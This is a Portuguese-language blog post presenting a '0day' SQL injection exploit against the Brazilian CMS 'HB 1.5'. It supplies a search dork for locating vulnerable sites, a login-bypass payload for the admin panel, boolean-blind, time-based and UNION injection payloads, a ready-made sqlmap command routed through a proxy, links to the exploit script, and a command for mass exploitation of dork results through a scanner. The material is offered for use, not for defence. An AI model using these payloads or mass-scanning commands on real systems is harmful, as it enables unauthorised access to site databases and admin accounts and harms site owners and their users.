Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

domingo, 17 de maio de 2015

Exploit 0day CMS HB 1.5


0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".

0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".


[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n

# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA:http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil




Neither war between hackers, nor peace for the system.



------------------------------------------------------------------------------



[ + ] FAILURE REPORTED:

15/maio/2015







[ + ] Type:



ADMINISTRATIVE ACCESS PANEL





[ + ] Vendor:

http://www.hbwebecia.com.br/



[ + ] Version: 

HB 1.5



[ + ] Google Dork:

inurl:"base.php?pagina"



[ + ] FILE VULN:

/admin/logar.php



[ + ] POC:

(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar



[ + ] FILE VULN:

/base.php



[ + ] POC:

(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)



[ + ] Exploração SQLMAP output:

# Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe



# Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC



# Type: UNION query

Title: Generic UNION query (NULL) - 7 columns

Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--



[ + ] USE SQLMAP:

./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'

--dbs --random-agent --level 3 --risk 2--proxy 'http://localhost:8118' 

--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only 

--flush-session --batch



[ + ] EXECUTE: 

php xpl.php -t http://target.us



[ + ] FILE_OUTPUT :

HB.txt



PRINT OUTPUT:







[ + ] EXECUTE:  php xpl.php -t http://target.us



[ + ] Exploit: 

http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP



[ + ] EXPLOIT MASS USE SCANNER INURLBR:

php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'



PRINT OUTPUT:







[ + ] EXPLOIT MASS USE SCANNER INURLBR: php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt--command-all 'php xpl.php -t _TARGET_'  PRINT OUTPUT:



More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR








By:



às




























Marcadores:
,
,
,
,
,














Nenhum comentário:















Postar um comentário


............
























Assinar:
Postar comentários (Atom)